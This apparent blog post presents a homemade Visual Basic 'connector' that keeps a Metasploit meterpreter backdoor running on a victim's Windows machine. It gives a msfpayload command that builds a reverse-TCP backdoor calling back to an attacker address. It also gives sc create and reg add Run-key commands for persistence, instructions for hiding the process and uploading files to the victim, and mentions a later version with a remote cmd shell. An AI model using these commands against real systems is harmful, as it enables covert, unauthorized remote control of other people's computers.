A while back I needed a way to make metasploit’s meterpreter persistent or to be able to remotely execute it whenever needed.
I decided to try and create a tool for doing that using Visual Basic
Let me first say that i am not a programmer, I have very basic programming skills (some code snippets were taken from planet source code).
The concept is very simple, The program have 2 parts:
1. Server (Console) – The server will act as a listener, Only receives connection from the client with no other features.
2. Client (Connector) – Will try to connect to the server (a reverse connection) at a pre-configured interval, Once connection is established it will auto execute the meterpreter exe file (or any other file you’d like).
Let’s assume you have already created a meterpreter binary payload and you have already deployed it on your target victim machine.
If not, here’s the syntax for creating a basic meterpreter binary payload:
exploit ~# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 X > backdoor.exe
Usage is simple, First time you launch the client(Connector) it will run in “config” mode which means it will be visible.
First time you should run it on your PC and configure the settings as desired.
Reomte Host IP: “Attacker/Listener ip address”
Remote Host Port: “Attacker/Listener port”
Visibility: “true or false”
Meterpreter Path: “meterpreter path on client/victim pc”
Connection Interval: “1000 – 60000″
After saving the changes an ini file will be created
In case you choose to run the client (Connector) in invisible mode the only way to make it visible again is by first killing its process via the task manager and then editing the ini file visible value.
You should upload the following files to the victim machine:
connector.exe & connector.ini – upload to any folder you like (both files should be in the same folder)
MSWINSCK.OCX – upload to windows/system32 folder if doesn’t already exist
In case you have administrative/system priviliges on victim machine you can run connector.exe as a system service using the following command (Win XP):
sc create connector binPath= "cmd /K start c:\windows\system32\connector.exe" start= auto error= ignore
net start connector
If only user privileges you can run it in startup:
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v connector /t REG_SZ /d "c:\windows\system32\connector.exe"
Once the client (Connector) is running on victim machine you can start the server on your side
After a connection is established from connector to console the exe file you’ve specified will be executed on the victim machine
This video shows the use of the connector and console, The same machine will be used as the attacker and victim system for convenience purposes only.
Here we can see how windows calculator executes when a connection is established.
Same as the first video but using meterpreter, again the same windows machine will be used as attacker/victim and with the exception of another session to a backtrack machine using ssh
this is just to show how the tool work and not a real world setup.
Later on I added some more features and expanded the program capabilities, I call this version “N@TSh3ll“:
added , multi sock to accept more connections, cmd shell, dyndns support
Here are some screen shots of the extended version: